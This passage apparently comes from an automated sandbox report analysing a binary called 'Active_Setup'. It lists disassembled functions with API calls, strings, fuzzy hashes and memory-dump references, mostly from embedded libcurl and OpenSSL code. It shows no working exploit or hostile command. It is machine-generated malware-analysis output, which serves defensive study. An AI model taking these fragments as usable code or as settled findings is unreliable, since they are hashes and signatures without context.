                                                                                                                                                  • Opcode Fuzzy Hash: 3a5d4762c834865d35b5c0fa67e13f5411f8cbc2c9dfe980f83a80893de7f5a7
                                                                                                                                                  • Instruction Fuzzy Hash: 2B61ABB16043019FC320DF29C880AABB7E5AF98724F14890CF9A587391D775E804CF62
                                                                                                                                                  Function 00FC93B0 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 134COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FC93F0
                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FC9420
                                                                                                                                                  • curl_msnprintf.ACTIVE_SETUP(?,00000009,%2lld:%02lld:%02lld,00000000,?,?,?,tP8g,tP8g,?,?,0000003C,00000000,00000000,?,0000003C), ref: 00FC9469
                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FC947F
                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FC94B1
                                                                                                                                                  • curl_msnprintf.ACTIVE_SETUP(?,00000009,%3lldd %02lldh,00000000,?,00000000,?,tP8g,tP8g,00000E10,00000000,00000000,?,00015180,00000000,tP8g), ref: 00FC94C6
                                                                                                                                                  • curl_msnprintf.ACTIVE_SETUP(?,00000009,%7lldd,00000000,?,tP8g,tP8g,00015180,00000000,tP8g,tP8g,00000E10,00000000,?,?,tP8g), ref: 00FC94E1
                                                                                                                                                    • Part of subcall function 00FC4DC0: curl_mvsnprintf.ACTIVE_SETUP(00000000,00000000,?,?,00FC108A,?,000000A0,[%s %s %s],Header,from,?,?,?,00000000,00000000), ref: 00FC4DD4
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$curl_msnprintf$curl_mvsnprintf
                                                                                                                                                  • String ID: %2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$--:--:--$tP8g
                                                                                                                                                  • API String ID: 3182149714-92647468
                                                                                                                                                  • Opcode ID: 5854f3c0bb43ad525f4c2f0f3981b0acb7afea0ff3e3730b5a4a61aea11b0413
                                                                                                                                                  • Instruction ID: da89c21a7ec4ec020c408a61f0c83c70643f2fd48d02acc1b23853458a105cf0
                                                                                                                                                  • Opcode Fuzzy Hash: 5854f3c0bb43ad525f4c2f0f3981b0acb7afea0ff3e3730b5a4a61aea11b0413
                                                                                                                                                  • Instruction Fuzzy Hash: DC312A723487057EF228F669AC86F7BBB9DDBC0F64F05851CF5846B182D5A1EC41C2A1
                                                                                                                                                  Function 00FBD330 Relevance: 17.8, APIs: 3, Strings: 7, Instructions: 256COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • curl_easy_unescape.ACTIVE_SETUP(?,?,00000000,00000000,?,?,?,?,?,?,?,?,00000000,00FBE2FD,?), ref: 00FBD46E
                                                                                                                                                  • curl_easy_unescape.ACTIVE_SETUP(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00FBE2FD,?), ref: 00FBD4DE
                                                                                                                                                  • __wcstoi64.LIBCMT ref: 00FBD5B9
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: curl_easy_unescape$__wcstoi64
                                                                                                                                                  • String ID: ://$Invalid IPv6 address format$socks$socks4$socks4a$socks5$socks5h
                                                                                                                                                  • API String ID: 3888968855-3220830998
                                                                                                                                                  • Opcode ID: 5383b19b9830fb14ce3ae956ba43840bbd8dd22ce277c9969c14fcde7fb595ee
                                                                                                                                                  • Instruction ID: bd5d15f8962a48bec53689fca999fb84e5d6aa154151820db32ed7ec7e54a844
                                                                                                                                                  • Opcode Fuzzy Hash: 5383b19b9830fb14ce3ae956ba43840bbd8dd22ce277c9969c14fcde7fb595ee
                                                                                                                                                  • Instruction Fuzzy Hash: 988119B1E043025BE7309A269C46BE77BD4AF01754F1C4529F885CA242FB75E944EBA3
                                                                                                                                                  Function 00FB251C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 145synchronizationCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00FB2526
                                                                                                                                                  • ReleaseMutex.KERNEL32(?), ref: 00FB25BC
                                                                                                                                                  • _memset.LIBCMT ref: 00FB25D0
                                                                                                                                                  • __snprintf.LIBCMT ref: 00FB25F7
                                                                                                                                                  • curl_easy_setopt.ACTIVE_SETUP(?,00002717,?), ref: 00FB260E
                                                                                                                                                  • curl_easy_setopt.ACTIVE_SETUP(?,00002711,?), ref: 00FB2631
                                                                                                                                                  • curl_easy_perform.ACTIVE_SETUP(?), ref: 00FB263A
                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00FB266C
                                                                                                                                                  • ReleaseMutex.KERNEL32(?), ref: 00FB2698
                                                                                                                                                  • ReleaseMutex.KERNEL32(?), ref: 00FB26BD
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MutexRelease$ObjectSingleWaitcurl_easy_setopt$__snprintf_memsetcurl_easy_perform
                                                                                                                                                  • String ID: %llu-%llu
                                                                                                                                                  • API String ID: 4246426443-3095788464
                                                                                                                                                  • Opcode ID: 375cf1d8586af4edb781e7b41d9e0852f7dcddd00c348cd1f22561aed3eb3cd8
                                                                                                                                                  • Instruction ID: b86de5252c1071c0f75d9c9a8df79d900d74c1271a29846960029a9b3322f542
                                                                                                                                                  • Opcode Fuzzy Hash: 375cf1d8586af4edb781e7b41d9e0852f7dcddd00c348cd1f22561aed3eb3cd8
                                                                                                                                                  • Instruction Fuzzy Hash: 20519AB5A04301AFC320EF25C890EABB7E6BF98724F54891CF99587391D775E805CB62
                                                                                                                                                  Function 00FC35E0 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 107networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • getpeername.WS2_32(?,?,?), ref: 00FC362E
                                                                                                                                                  • WSAGetLastError.WS2_32(?,?), ref: 00FC3638
                                                                                                                                                    • Part of subcall function 00FC64B0: GetLastError.KERNEL32(?,00000000,?,00FC127B,?,00000000), ref: 00FC64B3
                                                                                                                                                    • Part of subcall function 00FC64B0: _strerror.LIBCMT ref: 00FC64DF
                                                                                                                                                    • Part of subcall function 00FC64B0: _strncpy.LIBCMT ref: 00FC64E9
                                                                                                                                                    • Part of subcall function 00FC64B0: _strrchr.LIBCMT ref: 00FC653D
                                                                                                                                                    • Part of subcall function 00FC64B0: _strrchr.LIBCMT ref: 00FC6558
                                                                                                                                                    • Part of subcall function 00FC64B0: GetLastError.KERNEL32 ref: 00FC6570
                                                                                                                                                    • Part of subcall function 00FC64B0: SetLastError.KERNEL32(00000000), ref: 00FC657B
                                                                                                                                                    • Part of subcall function 00FC1180: curl_mvsnprintf.ACTIVE_SETUP(00FB8A4C,00004000,tP8g,tP8g,tP8g,00000000,00FC9C63,tP8g,Callback aborted), ref: 00FC119C
                                                                                                                                                    • Part of subcall function 00FC1180: curl_msnprintf.ACTIVE_SETUP(8904C483,00000100,0109FC00,00FB8A4C), ref: 00FC11C3
                                                                                                                                                  • getsockname.WS2_32(?,?,?), ref: 00FC366E
                                                                                                                                                  • WSAGetLastError.WS2_32(?,?), ref: 00FC3678
                                                                                                                                                  Strings
                                                                                                                                                  • ssrem inet_ntop() failed with errno %d: %s, xrefs: 00FC36CA
                                                                                                                                                  • getpeername() failed with errno %d: %s, xrefs: 00FC3649
                                                                                                                                                  • ssloc inet_ntop() failed with errno %d: %s, xrefs: 00FC370B
                                                                                                                                                  • getsockname() failed with errno %d: %s, xrefs: 00FC3689
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$_strrchr$_strerror_strncpycurl_msnprintfcurl_mvsnprintfgetpeernamegetsockname
                                                                                                                                                  • String ID: getpeername() failed with errno %d: %s$getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s$ssrem inet_ntop() failed with errno %d: %s
                                                                                                                                                  • API String ID: 1553613232-670633250
                                                                                                                                                  • Opcode ID: be614a62eca03f050a41d630ac0c8e1ccf1624d0a9967ea68e8ce0df7dcaebb0
                                                                                                                                                  • Instruction ID: 36eae9ead77c646a41694438b8ef2e83df0832391a55ebf605ddd511c208dfa7
                                                                                                                                                  • Opcode Fuzzy Hash: be614a62eca03f050a41d630ac0c8e1ccf1624d0a9967ea68e8ce0df7dcaebb0
                                                                                                                                                  • Instruction Fuzzy Hash: 163164B1504207ABD730EF21DD46FEB7B9CEF85794F04841DFD4992102E639AA099BA2
                                                                                                                                                  Function 01060CE0 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _strncmp
                                                                                                                                                  • String ID: .\ssl\ssl_ciph.c$SUITEB128$SUITEB128C2$SUITEB128ONLY$SUITEB192
                                                                                                                                                  • API String ID: 909875538-1589776776
                                                                                                                                                  • Opcode ID: ada45a320b3723889534dbf4c6ad5ce3c95e9f36b9e32079b48a631aa30c1767
                                                                                                                                                  • Instruction ID: b1ee8de2426257284ca3857514a9136b4ef99b6ff97187fa587252c907737644
                                                                                                                                                  • Opcode Fuzzy Hash: ada45a320b3723889534dbf4c6ad5ce3c95e9f36b9e32079b48a631aa30c1767
                                                                                                                                                  • Instruction Fuzzy Hash: E831C2B0B803019FEB949E28DCD2B6937E8AB54710F5005ADFCC28F2CAE6B4E5C0C651
                                                                                                                                                  Function 00FFE0E8 Relevance: 15.2, APIs: 10, Instructions: 174COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CountTick$CloseCurrentFreeGlobalHandleLibraryMemoryProcessStatus
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2654232908-0
                                                                                                                                                  • Opcode ID: 57dc0d4ffc36162dc88f7bc13f5dc1c11ec0f49052be424f87afdf7b1d4e3d60
                                                                                                                                                  • Instruction ID: 1c6383ddb8cd5576a484f689da2051e2a7f727271fb53a33f296911221247dc3
                                                                                                                                                  • Opcode Fuzzy Hash: 57dc0d4ffc36162dc88f7bc13f5dc1c11ec0f49052be424f87afdf7b1d4e3d60
                                                                                                                                                  • Instruction Fuzzy Hash: 0B616F75D0020A9BDF20EFA4D888BED7BB9FF48300F040559E645A62A1DB399A44DB61
                                                                                                                                                  Function 00FBE010 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 458COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • Re-using existing connection! (#%ld) with host %s, xrefs: 00FBE561
                                                                                                                                                  • We can reuse, but we want a new connection anyway, xrefs: 00FBE50C
                                                                                                                                                  • Found connection %ld, with requests in the pipe (%zu), xrefs: 00FBE4E0
                                                                                                                                                  • memory shortage, xrefs: 00FBE241
                                                                                                                                                  • %s://%s, xrefs: 00FBE191
                                                                                                                                                  • No connections available., xrefs: 00FBE5F1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: %s://%s$Found connection %ld, with requests in the pipe (%zu)$No connections available.$Re-using existing connection! (#%ld) with host %s$We can reuse, but we want a new connection anyway$memory shortage
                                                                                                                                                  • API String ID: 0-2087944716
                                                                                                                                                  • Opcode ID: 322beb98b83170c8a0f65f64545daa158f07981b4c0b4a6fb1714ab94de569b3
                                                                                                                                                  • Instruction ID: 4c4121adbfa837a56d092e38f26fbafa885db6972c6062ab008b185c4aa65beb
                                                                                                                                                  • Opcode Fuzzy Hash: 322beb98b83170c8a0f65f64545daa158f07981b4c0b4a6fb1714ab94de569b3
                                                                                                                                                  • Instruction Fuzzy Hash: 9102AFB19042418BCB71DF2ACC85BDA77E9BF88714F084529EC498B242EB759944DF92
                                                                                                                                                  Function 00FBCDB0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 358COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • curl_strequal.ACTIVE_SETUP(?,?), ref: 00FBD09D
                                                                                                                                                  • curl_strequal.ACTIVE_SETUP(?,?,?,?,?,?,?,?,?,?,00000000,?,00FBE4A4,?,00000000,?), ref: 00FBD0BB
                                                                                                                                                  Strings
                                                                                                                                                  • Connection #%ld isn't open enough, can't reuse, xrefs: 00FBD2A5
                                                                                                                                                  • Connection %ld seems to be dead!, xrefs: 00FBCEE0
                                                                                                                                                  • Found bundle for host %s: %p, xrefs: 00FBCE49
                                                                                                                                                  • Server doesn't support pipelining, xrefs: 00FBCE68
                                                                                                                                                  • Connection #%ld is still name resolving, can't reuse, xrefs: 00FBCF60
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: curl_strequal
                                                                                                                                                  • String ID: Connection #%ld is still name resolving, can't reuse$Connection #%ld isn't open enough, can't reuse$Connection %ld seems to be dead!$Found bundle for host %s: %p$Server doesn't support pipelining
                                                                                                                                                  • API String ID: 1413590006-3058172449
                                                                                                                                                  • Opcode ID: 345fad9a33f5b15ed1c414690d88825efce1ed670a026b66e5ba4cdcbd7d19e9
                                                                                                                                                  • Instruction ID: 3602b2bb6e62f3657be64e3fe85b2753388bb1047235f4bbf037d15ef17a8e9b
                                                                                                                                                  • Opcode Fuzzy Hash: 345fad9a33f5b15ed1c414690d88825efce1ed670a026b66e5ba4cdcbd7d19e9
                                                                                                                                                  • Instruction Fuzzy Hash: 5CE1C374E05A429BDB24DF26C984BE6B3A5BF80324F04461CE8088B241EB75ED55EFD2
                                                                                                                                                  Function 00FFAF30 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 151COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _strncmp
                                                                                                                                                  • String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
                                                                                                                                                  • API String ID: 909875538-2908105608
                                                                                                                                                  • Opcode ID: 6bed813ac2a3edb02696f4d2c5e740e0c3b99f31261f3e041801460e831c4871
                                                                                                                                                  • Instruction ID: fd2c5f951031dce01329e190dceadf5fa5e85e5dbc99d9e976fde21848f25aa3
                                                                                                                                                  • Opcode Fuzzy Hash: 6bed813ac2a3edb02696f4d2c5e740e0c3b99f31261f3e041801460e831c4871
                                                                                                                                                  • Instruction Fuzzy Hash: 3D412DE1F8831529F7306629FC13FA777858F50B60F0C0856FAC9ED2D3E2D58482A296
                                                                                                                                                  Function 00FD4820 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 149COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • curl_msnprintf.ACTIVE_SETUP(-00000004,00000005,%c%c%c%c,?,?,?,43424100,?,?,?,?,?), ref: 00FD4932
                                                                                                                                                  • curl_msnprintf.ACTIVE_SETUP(-00000004,00000005,%c%c%c=,?,?,43424100,?,?,?,?,?), ref: 00FD4967
                                                                                                                                                    • Part of subcall function 00FC4DC0: curl_mvsnprintf.ACTIVE_SETUP(00000000,00000000,?,?,00FC108A,?,000000A0,[%s %s %s],Header,from,?,?,?,00000000,00000000), ref: 00FC4DD4
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
